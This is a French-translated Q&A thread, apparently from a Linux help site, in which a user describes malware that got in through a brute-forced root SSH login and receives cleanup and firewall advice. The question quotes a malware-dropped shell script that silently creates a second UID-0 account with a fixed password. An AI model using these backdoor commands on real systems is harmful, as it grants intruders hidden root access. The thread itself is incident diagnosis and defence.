Comment gérer les logiciels malveillants sur mon ordinateur portable?


12

Je suis assez certain que mon ordinateur portable Ubuntu 13.10 est infecté par une sorte de malware.

De temps en temps, je trouve un processus / lib / sshd (appartenant à root) en cours d'exécution et consommant beaucoup de CPU. Ce n'est pas le serveur sshd qui exécute / usr / sbin / sshd.

Le binaire a les autorisations --wxrw-rwt et il génère et génère des scripts dans le répertoire / lib. Un récent est nommé 13959730401387633604 et il fait ce qui suit

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

L'utilisateur gusr a été créé indépendamment par le malware, puis le chpasswd se bloque tout en consommant 100% de CPU.

Jusqu'à présent, j'ai identifié que l'utilisateur gusr a été ajouté aux fichiers dans / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Il semble que le malware ait fait des copies de tous ces fichiers avec le suffixe "-". La liste complète des fichiers / etc / qui ont été modifiés par root est disponible ici .

De plus, le fichier / etc / hosts a été changé en ceci .

Le / lib / sshd commence par s'ajouter à la fin du fichier /etc/init.d/rc.local!

J'ai supprimé l'utilisateur, supprimé les fichiers, tué l'arborescence des fichiers traités, changé mes mots de passe et supprimé les clés publiques ssh.

Je suis conscient que je suis essentiellement foutu, et je vais probablement réinstaller tout le système. Néanmoins, puisque je me connecte à plusieurs autres machines, il serait bon d'essayer au moins de le supprimer et de comprendre comment je l'ai obtenu. Toute suggestion sur la façon de procéder serait appréciée.

Il semble qu'ils soient entrés le 25 mars en se connectant à la racine avec un forçage brutal. Je n'avais aucune idée que root ssh est activé par défaut dans Ubuntu. Je l'ai désactivé et mis en place des denyhosts.

La connexion était de 59.188.247.236, quelque part à Hong Kong, apparemment.

J'ai obtenu l'ordinateur portable d'EmperorLinux et ils ont activé l'accès root. Si vous en avez un et que vous utilisez sshd, méfiez-vous.


2
Retirez votre machine du réseau! Maintenant!
Seth

2
Et pourquoi la connexion root est-elle activée? C'est quelque chose que vous ne devriez pas activer sans une bonne raison.
Seth

@Seth Je ne l'ai pas activé, il était activé par défaut dans Ubuntu. Je suis aussi surpris que toi.
Dejan Jovanović

1
Voir « Par défaut, le démon SSH est livré avec des connexions root distantes activées. Normalement, Ubuntu n'autorise pas l'accès direct à l'utilisateur root, donc ce paramètre est sans importance. Si vous avez défini un mot de passe sur le compte root, ce paramètre peut être un potentiel risque de sécurité, et doit être désactivé. "
Seth

1
Je suis assez certain que ce n'est pas le cas Linux/Ebury. C'est autre chose, et il est possible qu'aucun nom ne soit attribué. Ebury ne créerait pas de nouveau compte utilisateur et aurait modifié la bibliothèque partagée utilisée par openssh, et non supprimée dans un nouveau binaire nommé sshd.
Riking

Réponses:


11

Tout d'abord, retirez cette machine du réseau maintenant!

Deuxièmement, pourquoi avez-vous activé le compte root? Vous ne devriez vraiment pas activer le compte root sauf si vous avez une très bonne raison de le faire.

Troisièmement, oui, la seule façon de vous assurer que vous êtes propre est de faire une installation propre. Il est également conseillé de recommencer à zéro et de ne pas revenir à une sauvegarde, car vous ne pouvez jamais être sûr quand tout a commencé.

Je vous suggère également de configurer un pare-feu lors de votre prochaine installation et de refuser toutes les connexions entrantes:

sudo ufw default deny incoming

puis autorisez ssh avec:

sudo ufw allow ssh

et NE PAS activer le compte root! Certes , assurez - vous que la connexion ssh root est désactivé.


4
J'ai vérifié le compte root. J'ai obtenu l'ordinateur portable d'Emperorlinux et ils ont activé le compte pour le configurer. Stupide.
Dejan Jovanović

1
@ DejanJovanović C'est terrible!
Seth
En utilisant notre site, vous reconnaissez avoir lu et compris notre politique liée aux cookies et notre politique de confidentialité.
Licensed under cc by-sa 3.0 with attribution required.